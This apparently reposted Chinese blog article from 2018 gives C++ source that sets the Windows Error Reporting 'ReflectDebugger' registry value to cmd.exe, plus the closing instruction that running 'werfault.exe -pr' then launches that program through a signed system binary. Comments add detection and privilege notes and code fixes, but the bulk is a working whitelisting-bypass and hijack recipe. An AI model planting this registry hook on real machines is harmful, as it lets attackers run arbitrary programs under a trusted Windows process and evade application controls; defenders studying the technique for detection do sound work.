【系統白程式利用】werfault.exe
阿新 • • 發佈:2018-11-08
#include "stdafx.h"
#include <windows.h>
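int _tmain(int argc, _TCHAR* argv[])
{
    // Writes the REG_SZ value
    //   HKLM\Software\Microsoft\Windows\Windows Error Reporting\Hangs\ReflectDebugger
    // with a program path. As the page notes, werfault.exe launches whatever path is
    // stored there, so the value acts as a debugger hook on a signed system binary.
    // Defensive view: the key is under HKLM, so the write only succeeds from an
    // elevated process (RegOpenKeyEx returns ERROR_ACCESS_DENIED otherwise); registry
    // value-set telemetry on this path is the detection point, and a ReflectDebugger
    // value that does not name a legitimate debugger should be treated as suspicious.
    //
    // Returns 0 when the value was written, 1 when any registry call failed.
    // Fixes over the original: a failed RegOpenKeyEx no longer falls through to
    // RegCreateKeyEx with a null handle; both key handles are closed on every path;
    // access rights are narrowed from KEY_ALL_ACCESS to what each call needs; the
    // "existing key" message no longer claims a new key was opened.
    (void)argc;
    (void)argv;

    // All locals are declared before the first goto: C++ forbids jumping past an
    // initialised declaration into its scope.
    int exitCode = 1;
    HKEY hRoot = nullptr;
    HKEY hHangs = nullptr;
    DWORD disposition = 0;
    LONG status = ERROR_SUCCESS;
    LPCTSTR lpRootKey = L"Software\\Microsoft\\Windows\\Windows Error Reporting";
    LPCTSTR lpSubKey = L"Hangs";
    LPCTSTR lpValueName = L"ReflectDebugger";
    LPCTSTR lpData = L"c:\\windows\\system32\\cmd.exe";
    // RegSetValueEx takes a byte count: characters (including the NUL) times TCHAR size.
    const DWORD cbData = static_cast<DWORD>((_tcslen(lpData) + 1) * sizeof(TCHAR));

    // Least privilege: only sub-key creation is needed on the parent key.
    status = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpRootKey, 0, KEY_CREATE_SUB_KEY, &hRoot);
    if (status != ERROR_SUCCESS)
    {
        wprintf(L"Open root key <%s> failed!\n" , lpRootKey);
        goto cleanup;
    }

    // Least privilege: only value writes are needed on the Hangs key.
    status = RegCreateKeyEx(hRoot, lpSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hHangs, &disposition);
    if (status != ERROR_SUCCESS)
    {
        wprintf(L"Create key <%s> failed!\n" , lpSubKey);
        goto cleanup;
    }
    if (disposition == REG_CREATED_NEW_KEY)
    {
        printf("Create new key successfuly!\n");
    }
    else if (disposition == REG_OPENED_EXISTING_KEY)
    {
        printf("Opened existing key successfully!\n");
    }

    status = RegSetValueEx(hHangs, lpValueName, 0, REG_SZ, reinterpret_cast<const BYTE*>(lpData), cbData);
    if (status != ERROR_SUCCESS)
    {
        printf("Set key value failed!\n");
        goto cleanup;
    }
    printf("Reg Add Successfully!\n");
    exitCode = 0;

cleanup:
    // Only close handles that were actually opened.
    if (hHangs != nullptr)
    {
        RegCloseKey(hHangs);
    }
    if (hRoot != nullptr)
    {
        RegCloseKey(hRoot);
    }
    // Holds the console open when run by double-click; unrelated to the registry work.
    system("pause");
    return exitCode;
}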
添加註冊表成功後，呼叫 werfault.exe -pr，werfault 會啟動登錄檔中填寫的可執行程式。
上面程式碼需要用管理員許可權編譯執行（寫入 HKLM 下的登錄檔鍵需要提升權限）。